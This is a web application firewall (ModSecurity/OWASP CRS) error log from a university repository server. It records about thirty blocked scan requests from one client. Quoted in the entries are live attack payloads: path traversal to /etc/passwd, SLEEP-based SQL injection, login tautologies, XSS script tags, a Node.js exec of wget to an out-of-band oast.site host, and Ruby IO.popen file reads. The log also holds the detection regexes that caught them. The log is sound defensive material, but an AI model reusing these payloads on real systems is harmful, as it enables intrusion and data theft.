[Tue Aug 29 11:43:50.356759 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAenGcAAAAAM"]
[Tue Aug 29 11:43:50.415134 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAcsLNwAAAAE"]
[Tue Aug 29 11:43:51.402181 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdb7toAAAAb"]
[Tue Aug 29 11:43:55.505676 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAeX1KEAAAAK"]
[Tue Aug 29 11:43:55.752113 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfbkrIAAAAZ"]
[Tue Aug 29 11:43:56.376726 2023] [:error] [pid 2017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfhHKMAAAAf"]
[Tue Aug 29 11:43:57.410816 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAdeQ7wAAAAQ"]
[Tue Aug 29 11:43:58.395122 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdb7vYAAAAb"]
[Tue Aug 29 11:43:59.407849 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAe8l7cAAAAF"]
[Tue Aug 29 11:44:03.641932 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7w8AAAAb"]
[Tue Aug 29 11:44:03.700184 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdb7xIAAAAb"]
[Tue Aug 29 11:44:08.384603 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAeX1MUAAAAK"]
[Tue Aug 29 11:44:08.394051 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAdeQ9kAAAAQ"]
[Tue Aug 29 11:44:08.430833 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAeX1MYAAAAK"]
[Tue Aug 29 11:44:10.612242 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAcvBrMAAAAJ"]
[Tue Aug 29 11:44:13.488916 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdeQ-QAAAAQ"]
[Tue Aug 29 11:44:14.465239 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAfVkYsAAAAD"]
[Tue Aug 29 11:44:16.486602 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26ghu1trjxfa4w4e.oast.site found within TX:1: cjmnbitjmimt14dgn26ghu1trjxfa4w4e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAeChjEAAAAw"]
[Tue Aug 29 11:44:19.392705 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAc4ExwAAAAP"]
[Tue Aug 29 11:44:20.432260 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gdtfk7pnbkodds.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfloSMAAAAj"]
[Tue Aug 29 11:44:23.580293 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAcsLToAAAAE"]
[Tue Aug 29 11:44:26.400300 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfg7x4AAAAe"]
[Tue Aug 29 11:44:27.401439 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAftVFoAAAAf"]
[Tue Aug 29 11:44:29.487561 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfGad4AAAAT"]
[Tue Aug 29 11:44:32.460865 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAfkzBcAAAAi"]
[Tue Aug 29 11:44:35.415155 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAe3@D4AAAAA"]
[Tue Aug 29 11:44:36.422714 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gbfmmwwdwbdpmt.oast.site found within TX:1: cjmnbitjmimt14dgn26gbfmmwwdwbdpmt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAfg70AAAAAe"]
[Tue Aug 29 11:44:44.360324 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAfGafUAAAAT"]
[Tue Aug 29 11:44:44.451173 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfVkeQAAAAD"]
[Tue Aug 29 11:44:47.666356 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfg728AAAAe"]
[Tue Aug 29 11:44:47.735974 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfcoUcAAAAa"]
